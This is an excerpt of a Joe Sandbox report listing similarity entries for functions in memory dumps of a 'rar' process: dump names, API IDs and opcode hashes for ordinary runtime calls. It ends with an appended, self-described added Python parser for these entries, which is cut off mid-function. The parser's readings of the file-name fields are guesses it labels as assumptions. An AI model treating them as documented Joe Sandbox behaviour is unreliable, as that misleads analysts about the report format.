• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
• Instruction ID: 77eecba9b37c3036db20deddcfcc6b876ad2e3938caed897aab071822122fa40
• Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
• Instruction Fuzzy Hash: 61516AB2B146518EEB64CFB4D4445AC37B1FB48B88B50407AEE0E97B58EF38D556CB00
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
• Instruction ID: 8b3e03ebdd265daaa9c0670bc78479e0716da6ae53bea0f122e34cd418b23e51
• Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
• Instruction Fuzzy Hash: 99314C66B146518DFB20CFB5D8801BC37B0FB08B48B54506AEE0ED7A58EF38D895C301
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID: exe$rar$rebuilt.$sfx
• API String ID: 0-13699710
• Opcode ID: 7f1be941d93c512069e4008a9a1ae17aa217bb635e404a929dbcb5c6f0d65e8f
• Instruction ID: 3e82f110262750dd5c3503597771cbc9f7957b99a10512f95b93d84813324595
• Opcode Fuzzy Hash: 7f1be941d93c512069e4008a9a1ae17aa217bb635e404a929dbcb5c6f0d65e8f
• Instruction Fuzzy Hash: 0681B266A0C68285EB70DB24D8122F933D2FF95B88F5041F5DA4DCB6CADE2DE616C740
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwindabort
• String ID: csm$f
• API String ID: 3913153233-629598281
• Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
• Instruction ID: 69408652c9e7692775685ec532c07981c1118dff801065884a43cfff38210ef4
• Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
• Instruction Fuzzy Hash: F5619F36A0A64286EB34DF25E645A7977D1FB44F98F1485F0EE9A87788DF38F8418700
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                      • String ID: $ACL
                                                                                                                                                                                                                                      • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                                      • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                      • Instruction ID: 68efaad5305c8b772e33ab37127efbf257ba96b3cdfef53a2c57db61c53d6172
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84314061A19A8196FB30DB21E5553E977E4FB88B84F8040F9EA8DC3656DF3CE605C740
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCompareHandleModuleOrdinalProcStringVersion
                                                                                                                                                                                                                                      • String ID: CompareStringOrdinal$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2522007465-2120454788
                                                                                                                                                                                                                                      • Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                      • Instruction ID: 97d2e97d0736497e3de729ccf9a83e80050e66111fd522d7c012b4d3456a5a45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B217C65A0DA4286EA319B11B84827877E1FF91FC0F6441F9EA5DC3B94EF2CE9468300
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                                      • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                                      • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                                      • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                      • Instruction ID: cc425bf0241a520b2998685b4a4d8ec779afbc5329d12d9e24ded7dcfa842747
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7821F576A182418EE760CF65E480AAD77F0F748B94F1450B6EE48D3B48DF38E8428F10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                      • Instruction ID: 2ecd09dbb9695b7fa60be971a207b4ba4ae153d785bcf49c3b425d6dec47c0ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91F04925A19A4281EFA98F11F49027973E0EF88F80F4820F9EA4FC6664DE3CE484C700
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
• Instruction ID: 664437afd38555c0b9faaf903acfe0f0719bf45de2e0511d9b149e3f91e2a332
• Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
• Instruction Fuzzy Hash: 68A1B962A4878296FB708F6190403BA76E1EF44FA4F4846F6DA6D877D5EF7CE4448340
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
• Instruction ID: f5412006c9c488846f5223d8a9387dafb6eb95a8c8df2e095162876a2ece0eec
• Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
• Instruction Fuzzy Hash: 0581C962E28A528AF7309F6598806BD76E6FB44F88F4441F5DE0E93791DF3CA462C310
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
• Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
• Instruction ID: e6da8d877130ce1fdeb539ee070e2cb83bcf3d2596591ca60e813c608ede6aa8
• Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
• Instruction Fuzzy Hash: 8B51BD72E14A518AF721CF25E8443AC7BF2FB48B98F0481B5DE4A97A99DF38D152C700
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CharHandleWrite$ByteConsoleFileMultiWide
• String ID:
• API String ID: 643171463-0
• Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
• Instruction ID: e487865da40d784138d5f7251e26e484039622b4bca566e7376054ba1f647f08
• Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
• Instruction Fuzzy Hash: 0341C161E18A4242FA349B21E9012BA72E0EF45FA0F0013F9EEAED77D5DE3CA5459740
APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
• Instruction ID: e796b930024e704d0c1a95636fc3938ac0e62554bc4ff29ceaf21bc0295b5e64
• Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
• Instruction Fuzzy Hash: 6641BE61B0AA4296FA358F46A8006B5B2E5FF46F90F1985F5DE5ECF384EE3CE4409340
APIs
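Every entry above follows the same fixed layout (Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and the raw page text fuses the "Download File" link onto each associated dump name. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it turns these entries into records, strips the link residue, indexes functions by API ID so that all functions in dump 2 of process 65 (rar) that touch a given API can be pulled out, and cross-checks each entry's snapshot name against its dump. The meaning of the first two dotted fields of the .sdmp name (hex process number, dump index) and of the hcaresult_<pid>_<dump>_<base>_<image>.jbxd pattern is inferred from the values on this page and labelled as an assumption in the code; the sample input is constructed from two entries in this section.

```python
"""Turn Joe Sandbox per-function Similarity entries into structured records."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: two entries copied from this section, with the extraction
# whitespace and the "Download File" link text still fused onto the dump names.
SAMPLE = """
Memory Dump Source
    • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
    • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
    • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
    • Instruction ID: f5412006c9c488846f5223d8a9387dafb6eb95a8c8df2e095162876a2ece0eec
    • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
    • Instruction Fuzzy Hash: 0581C962E28A528AF7309F6598806BD76E6FB44F88F4441F5DE0E93791DF3CA462C310
APIs
Memory Dump Source
    • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
    • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
    • Instruction ID: e796b930024e704d0c1a95636fc3938ac0e62554bc4ff29ceaf21bc0295b5e64
    • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
    • Instruction Fuzzy Hash: 6641BE61B0AA4296FA358F46A8006B5B2E5FF46F90F1985F5DE5ECF384EE3CE4409340
"""

_SOURCE_RE = re.compile(
    r"^Source File: (?P<dump>\S+\.sdmp), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
_LINK_RESIDUE = "Download File"  # link text the page extraction fused onto dump names


@dataclass
class FunctionEntry:
    dump: str                    # .sdmp the function was disassembled from
    base_address: int            # "Offset:" value, the load base of that dump
    based_on_pe: bool
    associated: List[str] = field(default_factory=list)
    snapshot: Optional[str] = None
    fields: Dict[str, str] = field(default_factory=dict)  # Similarity key/values

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")

    def dump_identity(self) -> Tuple[int, int]:
        # Assumption, checked against the page: the first two dotted fields of the
        # .sdmp name are the process number (hex, 00000041 -> 65) and the dump
        # index (00000002 -> 2).
        parts = self.dump.split(".")
        return int(parts[0], 16), int(parts[1], 10)


def _clean(raw: str) -> str:
    line = raw.strip().lstrip("•").strip()
    return line[: -len(_LINK_RESIDUE)].rstrip() if line.endswith(_LINK_RESIDUE) else line


def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
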